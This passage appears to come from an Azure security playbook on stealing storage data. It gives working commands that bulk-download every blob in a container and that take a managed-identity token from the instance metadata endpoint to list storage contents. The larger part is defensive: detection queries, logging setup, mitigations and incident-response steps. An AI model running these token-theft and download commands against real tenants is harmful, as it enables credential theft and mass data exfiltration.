# (wget -r cannot crawl the listing response on its own)
for f in $(curl -s "https://contosobackup.blob.core.windows.net/backups?restype=container&comp=list" | grep -oP '(?<=<Name>)[^<]+'); do
    wget "https://contosobackup.blob.core.windows.net/backups/$f"
done

Expected Output:

<?xml version="1.0" encoding="utf-8"?>
<EnumerationResults ...>
  <Blobs>
    <Blob>
      <Name>database-backup-2026-01-06.bak</Name>
      <Url>https://contosobackup.blob.core.windows.net/backups/database-backup-2026-01-06.bak</Url>
      <Size>850000000000</Size>
    </Blob>
    ...
  </Blobs>
</EnumerationResults>

[+] database-backup-2026-01-06.bak (850 GB downloaded)
[+] database-backup-2026-01-05.bak (850 GB downloaded)
[+] Total: 1.7 TB exfiltrated

Business Impact:


METHOD 4: Managed Identity Token Extraction (SSRF from Compute)

Supported Versions: All Azure compute resources with assigned managed identity

Prerequisites: Code execution on Azure compute resource with storage-accessing managed identity

Difficulty: Medium (requires understanding of instance metadata service)


Step 1: Extract Managed Identity Token from Metadata Service

Objective: Retrieve Entra ID access token from Azure Instance Metadata Service (allows storage access if identity has permissions).

Command (From Azure VM/Function - All Versions):

# Get managed identity token (from within Azure compute)
$MetadataUri = "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://storage.azure.com/"

$Response = Invoke-WebRequest -Uri $MetadataUri -Headers @{Metadata="true"} -UseBasicParsing
$TokenResponse = $Response.Content | ConvertFrom-Json
$AccessToken = $TokenResponse.access_token

Write-Host "[+] Token obtained: $($AccessToken.Substring(0, 50))..."

Expected Output:

[+] Token obtained: eyJhbGciOiJSUzI1NiIsImtpZCI6IjFjQUZwYjR...

Step 2: Use Token to Access Storage

Objective: Authenticate to storage account using managed identity token.

Command (All Versions):

# Get token
$MetadataUri = "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://storage.azure.com/"
$Response = Invoke-WebRequest -Uri $MetadataUri -Headers @{Metadata="true"} -UseBasicParsing
$TokenResponse = $Response.Content | ConvertFrom-Json   # parse .Content, not the response object
$AccessToken = $TokenResponse.access_token

# Use token to access storage (REST API)
$StorageAccountName = "prodstorageacct001"
$ContainerName = "data"

$ListUri = "https://$StorageAccountName.blob.core.windows.net/$ContainerName?restype=container&comp=list"
$Headers = @{Authorization = "Bearer $AccessToken"}

$BlobList = Invoke-WebRequest -Uri $ListUri -Headers $Headers -UseBasicParsing
$BlobXml = [xml]$BlobList.Content

Write-Host "[+] Found $($BlobXml.EnumerationResults.Blobs.Blob.Count) blobs in $ContainerName"
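Defenders validating what a leaked managed-identity token can reach can decode its unsigned payload offline. A sketch (the sample token below is fabricated purely so the decoder has input; real tokens come from the IMDS response's `access_token` field):

```python
import base64, json

def jwt_claims(token):
    """Decode the (unverified) payload segment of a JWT access token."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)   # restore base64url padding
    return json.loads(base64.urlsafe_b64decode(payload))

# Fabricated token: header {"alg":"none"}, payload with the claims of interest.
claims = {"aud": "https://storage.azure.com", "exp": 1767700000}
fake = "eyJhbGciOiJub25lIn0." + base64.urlsafe_b64encode(
    json.dumps(claims).encode()).decode().rstrip("=") + "."
decoded = jwt_claims(fake)
print(decoded["aud"])
```

The `aud` (audience) claim shows which resource the token is scoped to, and `exp` bounds how long the stolen token remains usable.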

6. ATTACK SIMULATION & VERIFICATION (Atomic Red Team)

Atomic Red Team Tests

Execution:

Invoke-AtomicTest T1530 -TestNumbers 1
Invoke-AtomicTest T1552.001 -TestNumbers 15

Reference: Atomic Red Team T1530 - GitHub


7. SPLUNK DETECTION RULES

Rule 1: Unusual Storage Account Key Retrieval

Rule Configuration:

SPL Query:

sourcetype=azure:audit OperationName="List Storage Account Keys" ResultType="Success"
| stats count earliest(TimeCreated) as FirstSeen latest(TimeCreated) as LastSeen by Caller, CallerIpAddress, Resource

What This Detects:


Rule 2: Bulk Data Download from Storage Account

Rule Configuration:

SPL Query:

sourcetype=azure:storage OperationName="GetBlob"
| search UserAgent!="*AzureStorageExplorer*"
| bin _time span=1h
| stats count by CallerIpAddress, UserAgent, _time
| where count > 100

What This Detects:
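The threshold logic in the SPL rule above is easy to prototype offline against exported logs. A sketch with invented events (IPs are documentation addresses):

```python
from collections import Counter

# (caller_ip, operation) events as they would arrive from blob access logs
# within one aggregation window.
events = [("203.0.113.7", "GetBlob")] * 150 + [("10.0.0.5", "GetBlob")] * 12

def flag_bulk_readers(evts, threshold=100):
    """IPs whose GetBlob count within the window exceeds the threshold."""
    counts = Counter(ip for ip, op in evts if op == "GetBlob")
    return sorted(ip for ip, n in counts.items() if n > threshold)

print(flag_bulk_readers(events))
```

Tuning `threshold` against a baseline of normal application traffic is the hard part; the count itself is trivial.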


8. MICROSOFT SENTINEL DETECTION

Query 1: Storage Account Key List Access

Rule Configuration:

KQL Query:

AzureActivity
| where OperationName == "List Storage Account Keys"
| where ActivityStatus =~ "Success"
| project TimeGenerated, Caller, CallerIpAddress, Resource, OperationName

Manual Configuration:

  1. Sentinel → Analytics → + Create → Scheduled query rule
  2. Name: Storage Account Key Retrieval
  3. Paste KQL above
  4. Frequency: 10 minutes
  5. Severity: High
  6. Create

Query 2: Anomalous Blob Read Pattern

Rule Configuration:

KQL Query:

StorageBlobLogs
| where OperationName == "GetBlob"
| where AuthenticationType in ("SAS", "AccountKey")
| summarize ReadCount = count() by CallerIpAddress, UserAgent, bin(TimeGenerated, 1h)
| where ReadCount > 100

What This Detects:


9. AZURE DIAGNOSTIC LOGGING CONFIGURATION

Enable Storage Account Diagnostic Logging

Manual Steps (Azure Portal):

  1. Navigate to Storage Account → Select account
  2. Left menu → Diagnostic settings
  3. Click + Add diagnostic setting
  4. Name: Storage-Blob-Logging
  5. Logs:
    • Check: StorageRead, StorageWrite, StorageDelete
  6. Destination:
    • Send to Log Analytics workspace (your Sentinel workspace)
  7. Save
  8. Wait 15 minutes for first events

Manual Configuration (PowerShell):

# Enable diagnostic logging for storage account
$StorageAccountName = "prodstorageacct001"
$ResourceGroupName = "production-rg"
$WorkspaceId = "/subscriptions/{subId}/resourcegroups/{rg}/providers/microsoft.operationalinsights/workspaces/{workspace}"

# Blob logs (StorageRead/Write/Delete) are emitted by the blob service sub-resource
$StorageAccountId = "/subscriptions/{subId}/resourceGroups/$ResourceGroupName/providers/Microsoft.Storage/storageAccounts/$StorageAccountName/blobServices/default"

Set-AzDiagnosticSetting -ResourceId $StorageAccountId `
    -Name "StorageDiagnostics" `
    -WorkspaceId $WorkspaceId `
    -Enabled $true `
    -Category StorageRead,StorageWrite,StorageDelete

Verify Logging (Sentinel):

// Run in Sentinel Logs
StorageBlobLogs
| take 20

10. DEFENSIVE MITIGATIONS

Priority 1: CRITICAL

1.1 Disable Shared Key Authorization (Use RBAC + SAS Only)

Objective: Eliminate storage account key access entirely; force RBAC or User Delegation SAS (both respect Azure IAM policies).

Applies To: All storage accounts

Impact: Prevents METHOD 1 (direct key retrieval)

Manual Steps (Azure Portal):

  1. Navigate to Storage Account → Settings → Configuration
  2. Find: Allow storage account key access
  3. Set to: Disabled
  4. Save

Manual Steps (PowerShell):

# Disable shared key access
Set-AzStorageAccount -ResourceGroupName "production-rg" `
    -AccountName "prodstorageacct001" `
    -AllowSharedKeyAccess $false

# Verify
$Account = Get-AzStorageAccount -ResourceGroupName "production-rg" -Name "prodstorageacct001"
Write-Host "Shared Key Access: $($Account.AllowSharedKeyAccess)"

Expected Output:

Shared Key Access: False

Impact on Users:

Migration Path:

  1. Before disabling: Identify all applications using storage keys
  2. Migrate to:
    • Azure Managed Identity (preferred for Azure-hosted apps)
    • User Delegation SAS (for external users/partners)
    • Service Principal with RBAC role
  3. Testing: Test migrated apps in dev/test before production
  4. Disable: After successful migration, disable shared keys

Validation Command (Verify Shared Key Access Blocked):

# Note: keys remain retrievable via the ARM management plane even after the
# setting is disabled - what changes is that data-plane requests signed with
# them are rejected. Validate against the data plane, not key retrieval:
$Keys = Get-AzStorageAccountKey -ResourceGroupName "production-rg" -Name "prodstorageacct001"
$Context = New-AzStorageContext -StorageAccountName "prodstorageacct001" -StorageAccountKey $Keys[0].Value

try {
    Get-AzStorageContainer -Context $Context -ErrorAction Stop | Out-Null
    Write-Host "[-] Shared key still accepted for data access!" -ForegroundColor Red
} catch {
    Write-Host "[+] Shared key rejected - shared key access disabled!" -ForegroundColor Green
}

Expected Output:

[+] Shared key rejected - shared key access disabled!

References:


1.2 Use User Delegation SAS Tokens (Time-Limited, Entra ID-Signed)

Objective: Replace Account SAS tokens with User Delegation SAS (respects RBAC, expires automatically, better auditability).

Applies To: All storage accounts (after disabling shared keys)

Impact: Limits token scope and lifetime

Manual Steps (Generate User Delegation SAS - PowerShell):

# Create a storage context using Entra ID authentication (no account keys involved)
$StorageAccountName = "prodstorageacct001"
$StorageContext = New-AzStorageContext -StorageAccountName $StorageAccountName -UseConnectedAccount

# With an OAuth-backed context, New-AzStorageContainerSASToken obtains a user
# delegation key from the service and returns a User Delegation SAS
# (scoped to a single container, 1 hour expiry)
$SASToken = New-AzStorageContainerSASToken -Name "customer-data" `
    -Permission rl `
    -ExpiryTime (Get-Date).AddHours(1) `
    -Context $StorageContext

Write-Host "User Delegation SAS: $SASToken"
Write-Host "[+] Token expires in 1 hour; respects RBAC of issuing user"

Expected Output:

User Delegation SAS: sv=2021-06-08&sr=c&sp=rl&se=2026-01-06T12:06:00Z&st=2026-01-06T11:06:00Z&spr=https&skoid={objectId}&sktid={tenantId}&sig=ABC123DEF456==

[+] Token expires in 1 hour; respects RBAC of issuing user
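Because a User Delegation SAS carries its expiry in the `se=` query parameter, expiry can be checked offline. A small Python sketch (the helper name and sample token are illustrative, not an Azure SDK API) demonstrates the check:

```python
from urllib.parse import parse_qs
from datetime import datetime, timezone

def sas_expired(sas_token, now=None):
    """Check the se= (expiry) field of a SAS token query string."""
    params = parse_qs(sas_token.lstrip("?"))
    expiry = datetime.fromisoformat(params["se"][0].replace("Z", "+00:00"))
    now = now or datetime.now(timezone.utc)
    return now >= expiry

# Illustrative token with a 12:06 UTC expiry
token = "sv=2021-06-08&sr=c&sp=rl&se=2026-01-06T12:06:00Z&sig=ABC123"
print(sas_expired(token, now=datetime(2026, 1, 6, 13, 0, tzinfo=timezone.utc)))  # True: past expiry
```

This is the key operational difference from account keys: a stolen User Delegation SAS dies on its own, and revoking the issuing user's delegation key kills it even earlier.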

Advantages of User Delegation SAS:

References:


1.3 Enable Diagnostic Logging & Real-Time Alerting

Objective: Capture all blob access operations and alert on suspicious patterns.

Applies To: All storage accounts

Impact: Enables detection of METHOD 1, 3, 4 attacks

Manual Steps (see Section 9 above for details)


Priority 2: HIGH

2.1 Implement Private Endpoints + Network Firewall

Objective: Restrict storage account access to private network only; prevent internet-accessible key extraction.

Applies To: Storage accounts containing sensitive data

Manual Steps (Azure Portal):

  1. Navigate to Storage Account → Networking
  2. Click + Private endpoint
  3. Resource group: Your resource group
  4. Name: prod-storage-private-endpoint
  5. Sub-resource: blob (for blob storage)
  6. Virtual network: Your private VNet
  7. Subnet: Private subnet
  8. Click Create
  9. Go to Networking → Firewall
  10. Set Default Action: Deny
  11. Add authorized IPs/vNets: Corporate VPN, app servers, etc.
  12. Save
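The firewall semantics configured above (explicit allow list, default Deny) can be modeled locally. This is a hypothetical Python sketch of the evaluation logic, not an Azure API; the ranges are example values:

```python
import ipaddress

def storage_firewall_allows(client_ip, allowed_ranges, default_action="Deny"):
    """Hypothetical model of the storage firewall: allow-list match wins,
    otherwise the default action decides."""
    ip = ipaddress.ip_address(client_ip)
    if any(ip in ipaddress.ip_network(r) for r in allowed_ranges):
        return True
    return default_action == "Allow"

rules = ["198.51.100.0/24", "10.0.0.0/8"]  # example: corporate VPN + app subnet
print(storage_firewall_allows("198.51.100.7", rules))   # True - on the allow list
print(storage_firewall_allows("203.0.113.50", rules))   # False - internet source, default Deny
```

With default Deny in place, even a valid stolen key or SAS token is useless from outside the allowed networks.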

Impact:


2.2 Implement Managed Identities (Eliminate Keys in Code)

Objective: Replace hardcoded storage keys in applications with Azure Managed Identity (automatic, time-bound authentication).

Applies To: Azure-hosted applications (VMs, Functions, App Services, Containers)

Impact: Reduces exposure of keys in source code, CI/CD logs

Manual Steps (Assign Managed Identity to VM):

  1. Navigate to Virtual Machine → Select VM
  2. Left menu → Identity
  3. System assigned → Status: On
  4. Save
  5. Navigate to Storage Account → Access Control (IAM)
  6. Click + Add role assignment
  7. Role: Storage Blob Data Contributor (or Reader if read-only)
  8. Assign to: Managed Identity → Select the VM
  9. Save

Application Code:

// No secrets in code! (C# - Azure.Identity and Azure.Storage.Blobs packages)
using Azure.Identity;
using Azure.Storage.Blobs;

var credential = new DefaultAzureCredential();  // Resolves the VM's managed identity at runtime
var client = new BlobContainerClient(new Uri("https://storageacct.blob.core.windows.net/container"), credential);
var blobs = client.GetBlobs();

2.3 Enable Microsoft Defender for Storage

Objective: Automated detection of malware, unusual access patterns, data exfiltration.

Applies To: All storage accounts

Manual Steps (Azure Portal):

  1. Navigate to Storage Account → Microsoft Defender for Cloud
  2. Enable: Defender for Storage
  3. Save

Manual Steps (PowerShell):

# Enable Defender for Storage (subscription-level plan covering all storage accounts)
Set-AzSecurityPricing -Name "StorageAccounts" -PricingTier "Standard"

Alerts Include:


11. DETECTION & INCIDENT RESPONSE

Indicators of Compromise (IOCs)

Azure Activity Log Patterns

Storage Blob Log Patterns

Network Indicators


Forensic Artifacts

Azure Activity Log

Storage Blob Logs (AzureDiagnostics)

Audit Trail


Response Procedures

Step 1: Isolate Storage Account

Objective: Prevent further data exfiltration while investigation proceeds.

Command (Disable Access - All Methods):

# Option 1: Enable firewall (blocks all public network access)
Update-AzStorageAccountNetworkRuleSet -ResourceGroupName "production-rg" `
    -Name "prodstorageacct001" `
    -DefaultAction Deny `
    -Bypass None

# Option 2: Rotate the primary key (invalidates stolen credentials)
New-AzStorageAccountKey -ResourceGroupName "production-rg" -Name "prodstorageacct001" -KeyName key1

Write-Host "[+] Storage account access restricted"
Write-Host "[!] key1 rotated - the old primary key is now invalid"

Impact:


Step 2: Rotate All Access Keys

Objective: Invalidate stolen keys immediately.

Command (All Versions):

# Rotate primary key (key1)
New-AzStorageAccountKey -ResourceGroupName "production-rg" -Name "prodstorageacct001" -KeyName key1

Write-Host "[+] key1 rotated (old key invalidated)"

# Wait 5 minutes for clients to fail over to key2
Start-Sleep -Seconds 300

# Rotate secondary key (key2)
New-AzStorageAccountKey -ResourceGroupName "production-rg" -Name "prodstorageacct001" -KeyName key2

Write-Host "[+] key2 rotated (all old keys invalidated)"
Write-Host "[!] Applications using old keys now fail - update config immediately"
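Rotating both keys matters because Azure accepts either key for authorization. A hypothetical Python model (the class and method names are illustrative, not an Azure API) shows why a stolen key only dies when its own slot is regenerated:

```python
# Hypothetical model of the dual-key scheme: any current key value authorizes requests.
class StorageAccountKeys:
    def __init__(self):
        self.keys = {"key1": "K1-original", "key2": "K2-original"}

    def regenerate(self, name):
        """Replace one key slot with a fresh value (old value stops working)."""
        self.keys[name] = f"{name}-rotated"

    def authorizes(self, presented):
        return presented in self.keys.values()

acct = StorageAccountKeys()
stolen_key1 = acct.keys["key1"]

acct.regenerate("key1")
print(acct.authorizes(stolen_key1))  # False: the stolen key1 is now invalid
# key2 may also have leaked, so rotate it too once applications have failed over
acct.regenerate("key2")
```

This is the rationale for the staged sequence above: rotate key1, let applications fail over, then rotate key2 so no pre-incident credential survives.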

Step 3: Investigate Exfiltrated Data

Objective: Determine what data was accessed.

Command (Query Blob Logs):

// Sentinel: Determine accessed blobs
StorageBlobLogs
| where OperationName == "GetBlob"
| where CallerIpAddress == "203.0.113.50"  // Attacker IP
| where TimeGenerated between (datetime(2026-01-06T10:00:00Z) .. datetime(2026-01-06T12:00:00Z))
| summarize TotalBytes = sum(ResponseContentLength), AccessCount = count() by Resource, Identity
| order by TotalBytes desc

Expected Output:

Resource                              TotalBytes      AccessCount  Identity
--------                              ----------      -----------  --------
database-backup-2026-01-06.bak        850000000000    1            svc_attacker
customer-data-export-2026.csv         850000000       1            svc_attacker
customer-pii.sql                      45000000        1            svc_attacker

Total: ~851 GB exfiltrated
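The same aggregation can be prototyped locally when triaging exported logs. This Python sketch mirrors the KQL summarize step; the field names follow the StorageBlobLogs columns and the figures are the example values above:

```python
from collections import defaultdict

def summarize_exfiltration(log_rows):
    """Mimic the KQL: sum bytes and count accesses per resource, largest first."""
    totals = defaultdict(lambda: [0, 0])  # resource -> [total_bytes, access_count]
    for row in log_rows:
        t = totals[row["Resource"]]
        t[0] += row["ResponseContentLength"]
        t[1] += 1
    return sorted(((r, b, c) for r, (b, c) in totals.items()), key=lambda x: -x[1])

rows = [
    {"Resource": "database-backup-2026-01-06.bak", "ResponseContentLength": 850_000_000_000},
    {"Resource": "customer-data-export-2026.csv", "ResponseContentLength": 850_000_000},
    {"Resource": "customer-pii.sql", "ResponseContentLength": 45_000_000},
]
for resource, total_bytes, count in summarize_exfiltration(rows):
    print(f"{resource}: {total_bytes} bytes over {count} reads")
```

Summing the byte counts gives the overall exfiltration volume for breach-notification scoping.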

Step 4: Determine Scope of Compromise

Objective: Identify if exfiltrated data was used elsewhere.

Actions:


12. COMPLETE ATTACK CHAIN

| Step | Phase | Technique | MITRE ID | Description | Enablement |
|------|-------|-----------|----------|-------------|------------|
| 1 | Initial Access | Phishing / Web Exploit | T1566 / T1190 | Compromise developer/admin machine | Enables code execution |
| 2 | Execution | PowerShell / Cloud CLI | T1059 | Execute Azure commands | Enables Azure authentication |
| 3 | Persistence | Create Service Principal | T1136 | Create attacker-controlled identity in Entra ID | Enables future access |
| 4 | Privilege Escalation (Optional) | RBAC Role Assignment Abuse | T1098 | Elevate to Storage Account Key Operator role | PREREQUISITE for METHOD 1 |
| 5 | Credential Access (Current) | Storage Account Key Theft | T1552.001 | Retrieve storage account keys | Enables unrestricted storage access |
| 6 | Collection | Data from Cloud Storage | T1530 | Download blobs/files | Enables data exfiltration |
| 7 | Exfiltration | Unencrypted Channel | T1048 | Transfer data to attacker infrastructure | IMPACT: Data breach |
| 8 | Impact | Data Destruction / Ransomware | T1485 / T1561 | Delete backups, deploy encryption | FINAL IMPACT: Unrecoverable loss |

13. REAL-WORLD EXAMPLES

Example 1: Microsoft AI Researchers Data Exposure (September 2023)


Example 2: Storm-0501 Cloud Storage Campaign (2025)


Example 3: Azure Misconfiguration Chain Leading to Admin Compromise (June 2025)


Example 4: Backup Data Exfiltration & Ransomware Deployment


14. INCIDENT RESPONSE CHECKLIST

Immediate Actions (0-2 hours)

Short-Term Actions (2-24 hours)

Medium-Term Actions (1-2 weeks)

Long-Term Actions (Ongoing)